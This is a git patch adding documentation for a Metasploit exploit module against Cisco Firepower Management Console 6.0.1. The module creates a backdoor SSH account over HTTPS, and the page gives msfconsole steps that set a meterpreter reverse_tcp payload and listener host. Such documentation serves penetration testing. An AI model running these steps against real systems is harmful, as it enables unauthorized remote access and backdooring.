From a59ca569e754b8dae13dea5e9f9da84f9b77a06f Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Mon, 9 Jan 2017 11:55:01 -0600
Subject: [PATCH] Add doc

---
 .../linux/http/cisco_firepower_useradd.md     | 23 +++++++++++++++++++
 1 file changed, 23 insertions(+)
 create mode 100644 documentation/modules/exploit/linux/http/cisco_firepower_useradd.md

diff --git a/documentation/modules/exploit/linux/http/cisco_firepower_useradd.md b/documentation/modules/exploit/linux/http/cisco_firepower_useradd.md
new file mode 100644
index 0000000000..b365e9dc43
--- /dev/null
+++ b/documentation/modules/exploit/linux/http/cisco_firepower_useradd.md
@@ -0,0 +1,23 @@
+This module exploits a vulnerability in Cisco Firepower Management Console RCE. It will
+create a backdoor SSH account via HTTPS, and then obtain a native payload session
+in SSH.
+
+## Vulnerable Application
+
+This exploit was specifically written against 6.0.1 (build 1213). To test, you can find the
+virtual appliance here:
+
+https://software.cisco.com/download/release.html?mdfid=286259687&softwareid=286271056&release=6.0.1&flowid=54052
+
+
+
+## Verification Steps
+
+1. Start msfconsole
+2. ```use exploit/linux/http/cisco_firepower_useradd```
+3. ```set password [https console password for admin]```
+4. ```set rhost [IP]```
+5. ```set payload linux/x86/meterpreter/reverse_tcp```
+6. ```set lhost [IP]```
+7. ```exploit```
+8. You should get a session